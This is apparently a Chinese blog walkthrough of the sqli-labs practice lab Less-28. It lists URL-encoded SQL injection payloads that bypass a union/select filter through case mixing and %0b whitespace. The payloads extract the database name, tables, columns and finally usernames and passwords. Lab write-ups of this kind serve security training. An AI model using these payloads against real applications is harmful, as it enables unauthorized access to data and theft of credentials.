Less（28）GET - Error Based- All your UNION & SELECT belong to us String-Single quote without parenthesis基于错误的，单引号字符型，过滤了union和select等的注入

1.这个和Less（27）差不多，就是把参数变成 id=('1')

2.爆破

　　（1）爆库：?id=0')%0buniOn%0bsElEct%0b1,database(),3%0bor%0b('1')=('1

　　（2）爆表：?id=0')%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security'%0b%26%26%0b('1')=('1

　　（3）表列名：?id=0')%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b('1')=('1

　　（4）爆值：?id=0')%0buniOn%0bsElEct%0b1,(group_concat(username,0x7e,password)),3%0bfrom%0busers%0buniOn%0bseLect (1),(2),('(3

posted @ 2020-03-03 17:21 孟雨阅读(182) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

孟雨

Less（28）GET - Error Based- All your UNION & SELECT belong to us String-Single quote without parenthesis基于错误的，单引号字符型，过滤了union和select等的注入

公告